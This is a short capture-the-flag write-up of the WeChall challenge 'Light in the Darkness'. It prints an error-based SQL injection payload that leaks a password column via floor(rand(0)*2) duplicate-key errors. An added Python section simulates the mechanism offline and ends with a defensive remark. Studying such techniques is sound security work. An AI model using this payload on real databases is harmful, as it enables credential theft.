Light in the Darkness

Posted by rk700 on June 20, 2014

http://www.wechall.net/challenge/Mawekl/light_in_the_darkness/index.php
This challenge echoes errors back, and the answer has to be obtained within 2 queries, so an error-based injection is used:

' or (select count(*) from information_schema.tables group by concat(password,floor(rand(0)*2)))-- 

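As for why this produces an error, see here:
http://stackoverflow.com/questions/11787558/sql-injection-attack-what-does-this-do
In short, floor(rand(0)*2) yields 0, 1, 1, 0, ... The repeated 1 in the 2nd and 3rd positions causes a duplicate group_key. We also need a table with more than 3 rows, so information_schema is chosen.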
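
The mechanism described above can be reproduced offline. The following is an added example, not code from the original post: it reimplements the RAND(0) generator and uses a simplified model of the GROUP BY temporary table (an assumption: the key expression is evaluated once to look a group up and once more when a new group row is inserted). The value "PLACEHOLDER" is a constructed stand-in for the column being concatenated.

```python
# Simplified model (assumption) of GROUP BY concat(col, floor(rand(0)*2))
# running against a temporary table with a unique group key.
MAX_VALUE = 0x3FFFFFFF

def mysql_rand0():
    """Yield the RAND(0) sequence: 0.1552..., 0.6208..., 0.6387..., 0.3310..."""
    seed1, seed2 = 55555555, 0          # generator state after seeding with 0
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE

def floor_bits():
    """Yield floor(rand(0)*2) for successive evaluations: 0, 1, 1, 0, ..."""
    for r in mysql_rand0():
        yield int(r * 2)

def first_duplicate(rows):
    """Return (row_number, key) where the duplicate-key error occurs, else None."""
    bits = floor_bits()
    groups = {}                          # temporary table: group key -> count
    for n, value in enumerate(rows, 1):
        key = f"{value}{next(bits)}"     # 1st evaluation: look the group up
        if key in groups:
            groups[key] += 1
            continue
        key = f"{value}{next(bits)}"     # 2nd evaluation: value actually inserted
        if key in groups:
            return n, key                # Duplicate entry '<key>' for key 'group_key'
        groups[key] = 1
    return None

if __name__ == "__main__":
    # Constructed input: every row carries the same concatenated value.
    for size in (1, 2, 3, 4):
        print(size, first_duplicate(["PLACEHOLDER"] * size))
```

Under this model the lookup and the insert see different values of the non-deterministic key, which is why the error message ends up containing the concatenated column value; returning generic errors to the client removes that channel.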